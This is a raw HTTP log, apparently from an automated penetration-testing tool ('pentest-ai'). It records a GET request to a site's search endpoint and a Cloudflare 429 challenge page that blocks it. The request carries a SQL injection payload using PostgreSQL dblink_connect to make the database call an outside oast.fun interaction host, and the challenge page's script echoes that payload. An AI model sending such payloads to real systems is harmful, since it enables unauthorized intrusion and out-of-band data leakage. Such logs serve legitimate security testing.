REQUEST:
GET https://my.myfirst.tech/search?q=%27%3B%20SELECT%20dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun%20user%3Dx%20password%3Dx%20dbname%3Dx%27%29%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:38:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9751
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84626ef9ea110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=dQra9V467zLauYp5hgUs3XOmSZSisrGtABKFcYhsGapn%2Fb%2FG3ScgCCknAG8XIlFdrRTVfd72cJzhwtBAhNOEjraH9m9zjx786USTctQpz3pyp%2B9rvPsrDIBKX%2Fj3iYPg5w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84626ef9ea110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '56s6BqY_XMRoYzxW.Y6Z9bxrXwBH1UKW5Qa3VzZ3Fsc-1784281109-1.2.1.1-VXF5euyBKuBeRCPpHKIIv.Ki9N8YGdCz6scHV2tDZTDlufCELlDHGjwXHTevGnHs',cITimeS: '1784281109',cRay: 'a1c84626ef9ea110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?q=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_tk=xH0.lgIlRIktAsbI7VIVunpd1gqDg.1UMqNnBEHDRyI-1784281109-1.0.1.1-FlRy1mT_pjkufStE.Go8YrPzm7wT5nHOSi021jpyIcY",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?q=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_f_tk=xH0.lgIlRIktAsbI7VIVunpd1gqDg.1UMqNnBEHDRyI-1784281109-1.0.1.1-FlRy1mT_pjkufStE.Go8YrPzm7wT5nHOSi021jpyIcY",md: 'GghMlPlpMkIO7dc5wUjebiajikAQgKrglurfeAKN4rY-1784281109-1.2.1.1-FvEvlBxazUtzgUhdEHIjH8hll28.ibCX_ygZi3zUh_NcEGPPs7BC5rp2cjvoBtZeYEZrh9dmWu5mjyP0x_W5j2WZAyjLEM8ZCQuXSowjeRQ4dSgzudjjTqqvnZp0yFP91JFw0NaZiNus37Dia0Y5RIUKgBTlD6BgTIuaQU1p.23p3xa1xq47m6Qyt3Cw4XWt8FzjS6ElAhVmZ7BAMDDPtN29jwX5romaWmizVg7iHN5aNcu5eSxTZ5Gei7SnLaTmaNa9jZd73VmL6vqNANmFqQWX7Xs3F_UFzamSSR3F.KysT5JMngpRSsd9gSAruDmuBqpKgK15SUks3ArK8w6.jHvnijepjiZL4genpOnDhSKDmzl.aeuixhE1dUChN1IRBTCxhSTsritNkVcISdZn6bLw6FnJyBOW9yJtCU7BVZTgsnWso7mIIA0elb928a52ynL0WxnJSs4TXLXjdrp2CDdCHKLRVQZWe4VKEfC9ErkkyNqiPSM_2cxaowgk_NVzyzs5UKbaS.m._aftdTezuzGnWSywXP44oaCdFaeBGhtcGh61v07MeRVMXR8pJV4YgjB.lXDfDRVyuhUENfYV3lXjNdAktHYYJzd7f6fJWgbcjViHfm19nC7zp0fO3gGHp3tTzwzoFqGJshONgynEnSekhP3vo_KyRDNsf4joSYoVt_SpAOw.72if7Yyu9yaDP5R5vqqJqw7WVlEyE9p_cjwATyZC8xVWeQ9sfMS7wQFY58r2GS7NxGDXIglyWwsXUV0JR9UhBskvPPA3ApZ_xTNYxrgnRuGN93W5jN8Z7DZVgRspgzw1PyNBszvOu6y.KqY9ihGEcnDRHfAwQQpJ2rY50j_nFD91bBGg2_mPArsCg39W2yT8xVD8UVdLUT_eAS8eX8cA5k5ylcXsN9tYGsvVaCBvH2_n15C1D8HqnPjY.IMi62xeet98leMzH1ckLFlh50NBP6Gx2MPyDEkAIITqrgrpSYRt3uxloGwxF7avpVuV53P1Kcm7NK3ds4waMj5XgyGKEWoG6HTm8Q_qZ6eWNeV3UVASyrK5wxYyNQ7.es16zHu8fi.BEpCSG1tN6x02u3SlMeIkhiz9L5ha.5xfEl2fnX_pKSM8oOahK7mGy2scDWVOsS.uiQwqZOMD4lKSBL8QZiPp1BTYOckQeMjjk87rOBXwVZkuqT.8rRs4hjltAMTtGJdYSr66KyvkJH64ntblU3MCRzm4hCug1xRZqiKcko1PIGYQNSI6aMJfMsS23wV9CKPmcIIidHDXPC_VnOsXTNm6via5UECXUsVpo06Z3nBVSFq5VGLd.hA',mdrd: 'DTYMwFWIydOv0.EDLWkZEoyVUYtXB4StYtM45LfJb8I-1784281109-1.2.1.1-nnQv400gK4olv0GRw3emMnxgMmnCUYAOiD.SJbCpqHgzOAkKm4BBpXYQ6RvlWGX.r442GkvHNMmgFLLJz_dmJ6bald_AUQYZ9z0iaxlTSU3VDZxs_lUTey7RIO5B9Yj4pHWw2HzstDbW.uSvVkiiQgFrNJEf4hEE3IOulxFqR4M4lShJ7Qydb_lmLW4U2NGw1aOwHgTNg9Ev93XpQfgku1NhgQIHhKIVwiO6glKUwFn3QadU76XUdklHgsG5hT03',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84626ef9ea110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?q=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_rt_tk=xH0.lgIlRIktAsbI7VIVunpd1gqDg.1UMqNnBEHDRyI-1784281109-1.0.1.1-FlRy1mT_pjkufStE.Go8YrPzm7wT5nHOSi021jpyIcY"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
